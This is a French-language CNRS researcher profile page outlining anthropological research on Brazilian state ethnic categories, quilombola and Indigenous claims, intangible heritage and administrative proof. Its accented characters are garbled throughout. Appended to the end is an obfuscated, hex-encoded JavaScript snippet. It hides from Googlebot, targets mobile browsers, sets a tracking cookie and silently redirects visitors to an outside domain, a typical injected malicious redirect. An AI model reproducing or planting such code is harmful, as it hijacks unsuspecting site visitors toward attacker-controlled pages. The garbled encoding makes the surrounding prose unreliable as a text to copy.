VA�ronique BOYER

VA�ronique BOYER, anthropologue au CNRS (laboratoire Mondes AmA�ricains, UMR 8168).

La recherche porte sur les effets sociaux des catA�gorisations ethniques promues depuis une trentaine da��annA�es par la��A�tat brA�silien. La mise en place de politiques publiques ciblA�es, qui ferait A�merger des pans A� invisibles A� de la population, dA�pend da��un quadruple travail dont il faut saisir les articulations : politique (choix de sociA�tA� nA�gociA� entre diffA�rents acteurs) ; juridique (choix des critA?res de caractA�risation) ; administratif (spA�cialisation des institutions) ; pratique (identification des groupes). A� partir da��enquA?tes de terrain dans des villages amazoniens rA�cemment dA�clarA�s quilombolas ou indiens, on cherchera A� comprendre comment les populations se positionnent face aux catA�gories institutionnelles, en mettant en A�vidence le contexte politique et social dans lequel sa��inscrivent les revendications A� identitaires A�, mais aussi en prA?tant une attention soutenue au cadre juridique et administratif qui les informe. Il sa��agit par ailleurs da��explorer comment les multiples acteurs sociaux prA�sents dans la rA�gion (institutions de la��Etat, ONGs, A�glise, militants, etc.) conA�oivent, construisent et retravaillent ces propositions juridico-identitaires A� partir de notions qui ne sont jamais donnA�es. Il sa��agit A� terme da��apporter un A�clairage sur les dynamiques sociales en cours en dA�gageant ce qui relA?ve, da��une part, de nouvelles formes da��organisation sociale et da��un nouveau rapport des citoyens A� la��A�tat et, da��autre part, du renouvellement des anciens modA?les de domination. Quatre thA?mes sont plus spA�cifiquement envisagA�s :

De la question identitaire A� la question sociale

La��accA?s A� des droits sociaux tend dA�sormais A� passer par le rattachement des populations A� une seule catA�gorie A�A�ethnoracialeA�A�. La��examen de la lignA�e A�A�africaineA�A� met pourtant en A�vidence les A�carts entre les dA�finitions A�tatiques et locales, ainsi que les distinctions faites par les groupes entre des expressions tenues pour A�quivalentes par les pouvoirs publics. Ce constat incite A� se dA�tourner da��un point de vue essentialiste sur les identitA�s pour considA�rer plutA?t les identifications successivement assumA�es ou rejetA�es par les groupes. La question identitaire se pose en effet avant tout dans les termes da��une question sociale oA? les enjeux de pouvoir, da��autoritA� et de lA�gitimitA� sont centraux. Recentrer la��analyse sur les processus de diffA�renciation sociale, sur le rapport au politique, sur le fonctionnement de la justice ainsi que sur les rA�gimes territoriaux associA�s aux populations labA�lisA�es par la��A�tat ouvre des pistes pour comprendre comment les groupes partageant une mA?me histoire et des conditions socio-A�conomiques analogues opA?rent des choix diffA�rents dans la dA�finition de leur identitA� lA�gale. Les intA�rA?ts divergents qui apparaissent au sein de parentA?les censA�es relever de la mA?me catA�gorie A�A�ethnoracialeA�A� et se traduisent par des tensions internes seront A�galement mieux saisis.

Le rA?le de la��anthropologie : les luttes de classifications

Ce volet sa��intA�resse A� la faA�on dont les lignes da��analyse da��une discipline, en la��occurrence la��anthropologie brA�silienne, sa��inflA�chissent en fonction des enjeux politiques. Partisans da��un projet de sociA�tA� qui promeut un traitement diffA�renciA� de la population par souci da��A�quitA� sociale, les anthropologues, chargA�s de rA�diger les rapports da��expertise joints aux demandes de rA�gularisation fonciA?re, sont devenus des acteurs A� part entiA?re du jeu politico-juridique. Cette proximitA� avec les institutions a pour consA�quence de placer les discussions de la��anthropologie des quilombos (descendants de noirs marrons) dans le cadre prA�dA�fini des catA�gories adoptA�es par la��A�tat. ConfrontA�s au dA�calage entre multiplicitA� des formes sociales locales et rigiditA� de la��identification institutionnelle, mais soucieux de rendre la��existence des quilombos incontestable sur la scA?ne politique, ils ont cherchA� des outils intellectuels au-delA� de la��approche situationnelleA�: tout da��abord la notion da��A�A�ethnieA�A�, puis celle de A�A�raceA�A� pour A�chapper A� la��injonction da��exhiber des traits A�A�culturelsA�A� associA�s A� la A�A�matrice africaineA�A�, et intA�grer les groupes dont la��adhA�sion A� cette identitA� politique na��est pas encore dA�clarA�e. Or, de tels glissements sont A�galement perceptibles pour la A�A�lignA�e amA�rindienneA�A� jusque-lA� arrimA�e A� la notion da��ethnie.

Le A� patrimoine immatA�riel A� : dA�finition, ambiguA?tA�s, appropriations

Pour la��A�tat, les catA�gorisations A�A�ethniquesA�A� correspondent A� des identitA�s spA�cifiques, elles-mA?mes symbolisA�es par des productions culturelles singuliA?res. La substitution de la��expression de A�A�culture populaireA�A�, qui fait rA�fA�rence A� ce qui est partagA� par tous, par celle de A�A�patrimoine immatA�rielA�A� qui semble plus A� mA?me da��A�voquer la particularitA� des groupes porteurs, se fait la��A�cho de ce changement. Or parce qua��il exige la sA�lection da��un nombre fini da��A�lA�ments pour dresser le portrait da��une pratique sociale A� un moment donnA�, le modA?le institutionnel peine A� inclure les conditions sociologiques de la reproduction des A�A�biens immatA�rielsA�A�. Ce dA�coupage du rA�el A� partir de la��opposition immatA�riel/matA�riel suscite da��ailleurs la��incomprA�hension des groupes dA�sireux de faire acte de candidature, tout autant que la perplexitA� les fonctionnaires eux-mA?mes lorsqua��ils cherchent A� A�tablir les limites da��un bien. Il convient donc da��engager une rA�flexion sur le rapport entre le discours officiel sur les A�A�identitA�s ethniques et culturellesA�A� et la faA�on dont les groupes se reprA�sentent leurs pratiques A�A�immatA�riellesA�A�, en indiquant que, du point de vue de ces derniers, la A�A�richesse des expressions culturellesA�A� est aussi A� prendre au sens littA�ral.

La preuve par la��A�crit : les identitA�s devant la��administration

Diverses expressions contribuent A� dessiner les contours da��un champ sA�mantique au sein duquel les catA�gorisations mises en A�uvre par la��A�tat sa��alimentent mutuellement. Dans le travail fourni pour construire des correspondances, le poids de la��administration et la��importance de la��A�crit se trouvent considA�rablement accrus. Da��une part, la reconnaissance da��une identitA� ethnique labA�lisA�e, ca��est-A�-dire ouvrant des droits, dA�pend de la��affirmation da��une spA�cificitA� socioculturelle dans des termes qui tiennent compte du dA�coupage institutionnel du tissu socialA�; da��autre part, cette diffA�rence est consignA�e dans de nombreux documents qui, pour certains, constituent des preuves recevables en droit. On peut alors se demander si les catA�gories institutionnelles ne contraignent pas la��A�nonciation par les groupes locaux de leur A�A�autodA�finitionA�A� (principe juridique retenu pour dA�finir les appartenances) et dans quelle mesure elles ne comptent pas autant que la perception prA�alable de soi dans le rapport aux groupes voisins. Revendications identitaires et mobilisations autour da��un patrimoine immatA�riel tendent ainsi A� faire des particularismes la seule voie de reconnaissance sociale, devant un A�tat en position da��un juge souverain qui confA?re de la lA�gitimitA� a�� ou non – aux demandes A�manant de groupes placA�s en concurrence.

 var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}